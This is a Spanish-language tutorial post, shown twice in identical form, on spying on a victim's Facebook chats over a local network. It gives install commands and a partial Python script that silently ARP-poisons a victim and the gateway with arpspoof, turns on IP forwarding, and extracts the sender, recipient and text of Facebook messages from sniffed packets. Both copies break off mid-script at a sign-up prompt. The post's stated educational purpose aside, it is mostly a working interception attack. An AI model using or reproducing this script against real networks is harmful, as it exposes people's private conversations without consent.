rapoes
Páginas: 11 (2614 palabras)
Publicado: 19 de junio de 2013
Hola a Todos..!
Hoy les mostraré de qué manera se pueden espiar las conversaciones en Facebook, siempre y cuando la víctima no tenga sus datos encriptados o lo que comúnmente se conoce en Facebook como ”Navegación Segura”.
Antes de todo, es importante mencionar que esta publicación se realiza con dos objetivos muy importantes.
Para fines Educativos.
Para concienciar a las personas atomar medidas de seguridad en la red.
Las herramientas que utilizaremos, en informática se le conoce como “Sniffer“, que según Wikipedia es: ”un analizador de paquetes que captura las tramas de una red de computadoras”.
‘
+Más información en: http://es.wikipedia.org/wiki/Analizador_de_paquetes.
‘
Luego de la introducción… Manos a la obra…!!.
‘
PASO I.
El código que utilizaremos está escritoen Pithon , así que necesitamos tener instalado las siguientes herramientas para que funcione.
En mi caso, utilizaré backtrack 5r1, que si bien es cierto, estas herramientas ya están instaladas, pero ustedes pueden instalarlas de la siguiente manera.
Para Debian, ubuntu y derivados.
‘
[naughtyboyOS ~# ] apt-get install python-dpkt python-pypcap dsniff
El comando de arriba tendrás queejecutarlo como root (por si acaso =P).
‘
Una vez instalado los paquetes, crearemos el siguiente script que nos permitirá sniffer a nuestra víctima.
‘
OJO: El script deberá ser guardado con la terminación .py (recordá que es lenguaje pithon).
‘
#!/usr/bin/env python
#-*-encoding:utf8-*-
""" El conocimiento es Libre"""
''' Traducido por ZtuX... publicado en http://cezequiel.wordpress.com'''"""
Este programa es software libre: Usted puede redistribuirlo y / o modificar
bajo los términos de la licencia GNU General Public License publicada por
la Free Software Foundation, bien de la versión 3 de la Licencia, o
(a su elección) cualquier versión posterior.
Este programa se distribuye con la esperanza de que sea útil,
pero SIN NINGUNA GARANTÍA,incluso sin la garantía implícita de
COMERCIALIZACIÓN o IDONEIDAD PARA UN PROPÓSITO PARTICULAR. Consulte la
Licencia Pública General GNU para más detalles.
Usted debería haber recibido una copia de la Licencia Pública General GNU
junto con este programa. Si no, vaya a http://www.gnu.org/licenses/>.
"""
import sys, os
import dpkt, pcap
def check_root():
""" DevuelveVerdadero (True) si el usuario es root, de lo contrario Falso (False) """
if os.getenv('LOGNAME','none').lower() == 'root':
return True
return False
def poison(iface,victim, gw):
""" IP Forwarding """
os.system("sysctl -w .net.ipv4.ip_forward=1 > /dev/null")
""" ARP cache poisoning, silent, in both directions """
os.system("arpspoof -i "+iface+" -t "+victim+""+gw+" 2> /dev/null &")
os.system("arpspoof -i "+iface+" -t "+gw+" "+victim+" 2> /dev/null &")
print("Envenenamiento de Cache ARP...")
def fbchatgrep(p,pid):
data = str(p.data)
if ("{\"t\":\"msg") and ("\"type\":\"msg\"") in data:
msgid=data[data.find("\"msgID\":")+9:data.rfind("\"},\"from\":")]
if (pid != msgid ): #Comprobar si el mensaje apareció antes (ARP poisonclones)
pid = msgid
print(" ")
s = "Mensaje de: "+data[data.find("from_name\":\"")+12:data.rfind("\",\"from_first_name")]
print(unicode(s,'unicode_escape').encode('utf-8'))
s = "Para: "+data[data.find("to_name\":\"")+10:data.rfind("\",\"to_first_name")]
print(unicode(s,'unicode_escape').encode('utf-8'))
s =data[data.find("\"text\":")+8:data.rfind(",\"time\"")-1]
print(unicode(s,'unicode_escape').encode('utf-8'))
print(" ")
return pid
if __name__ == '__main__':
if len(sys.argv) < 4:
print '''Traducido por ZtuX... Visita http://cezequiel.wordpress.com
Para usar siga esta Sintaxis: ./sniff.py
Ejemplo: ./sniff.py eth0 192.168.1.2 192.168.1.254'''
sys.exit(0)
if not check_root():...
Hola a Todos..!
Hoy les mostraré de qué manera se pueden espiar las conversaciones en Facebook, siempre y cuando la víctima no tenga sus datos encriptados o lo que comúnmente se conoce en Facebook como ”Navegación Segura”.
Antes de todo, es importante mencionar que esta publicación se realiza con dos objetivos muy importantes.
Para fines Educativos.
Para concienciar a las personas atomar medidas de seguridad en la red.
Las herramientas que utilizaremos, en informática se le conoce como “Sniffer“, que según Wikipedia es: ”un analizador de paquetes que captura las tramas de una red de computadoras”.
‘
+Más información en: http://es.wikipedia.org/wiki/Analizador_de_paquetes.
‘
Luego de la introducción… Manos a la obra…!!.
‘
PASO I.
El código que utilizaremos está escritoen Pithon , así que necesitamos tener instalado las siguientes herramientas para que funcione.
En mi caso, utilizaré backtrack 5r1, que si bien es cierto, estas herramientas ya están instaladas, pero ustedes pueden instalarlas de la siguiente manera.
Para Debian, ubuntu y derivados.
‘
[naughtyboyOS ~# ] apt-get install python-dpkt python-pypcap dsniff
El comando de arriba tendrás queejecutarlo como root (por si acaso =P).
‘
Una vez instalado los paquetes, crearemos el siguiente script que nos permitirá sniffer a nuestra víctima.
‘
OJO: El script deberá ser guardado con la terminación .py (recordá que es lenguaje pithon).
‘
#!/usr/bin/env python
#-*-encoding:utf8-*-
""" El conocimiento es Libre"""
''' Traducido por ZtuX... publicado en http://cezequiel.wordpress.com'''"""
Este programa es software libre: Usted puede redistribuirlo y / o modificar
bajo los términos de la licencia GNU General Public License publicada por
la Free Software Foundation, bien de la versión 3 de la Licencia, o
(a su elección) cualquier versión posterior.
Este programa se distribuye con la esperanza de que sea útil,
pero SIN NINGUNA GARANTÍA,incluso sin la garantía implícita de
COMERCIALIZACIÓN o IDONEIDAD PARA UN PROPÓSITO PARTICULAR. Consulte la
Licencia Pública General GNU para más detalles.
Usted debería haber recibido una copia de la Licencia Pública General GNU
junto con este programa. Si no, vaya a http://www.gnu.org/licenses/>.
"""
import sys, os
import dpkt, pcap
def check_root():
""" DevuelveVerdadero (True) si el usuario es root, de lo contrario Falso (False) """
if os.getenv('LOGNAME','none').lower() == 'root':
return True
return False
def poison(iface,victim, gw):
""" IP Forwarding """
os.system("sysctl -w .net.ipv4.ip_forward=1 > /dev/null")
""" ARP cache poisoning, silent, in both directions """
os.system("arpspoof -i "+iface+" -t "+victim+""+gw+" 2> /dev/null &")
os.system("arpspoof -i "+iface+" -t "+gw+" "+victim+" 2> /dev/null &")
print("Envenenamiento de Cache ARP...")
def fbchatgrep(p,pid):
data = str(p.data)
if ("{\"t\":\"msg") and ("\"type\":\"msg\"") in data:
msgid=data[data.find("\"msgID\":")+9:data.rfind("\"},\"from\":")]
if (pid != msgid ): #Comprobar si el mensaje apareció antes (ARP poisonclones)
pid = msgid
print(" ")
s = "Mensaje de: "+data[data.find("from_name\":\"")+12:data.rfind("\",\"from_first_name")]
print(unicode(s,'unicode_escape').encode('utf-8'))
s = "Para: "+data[data.find("to_name\":\"")+10:data.rfind("\",\"to_first_name")]
print(unicode(s,'unicode_escape').encode('utf-8'))
s =data[data.find("\"text\":")+8:data.rfind(",\"time\"")-1]
print(unicode(s,'unicode_escape').encode('utf-8'))
print(" ")
return pid
if __name__ == '__main__':
if len(sys.argv) < 4:
print '''Traducido por ZtuX... Visita http://cezequiel.wordpress.com
Para usar siga esta Sintaxis: ./sniff.py
Ejemplo: ./sniff.py eth0 192.168.1.2 192.168.1.254'''
sys.exit(0)
if not check_root():...
Leer documento completo
Regístrate para leer el documento completo.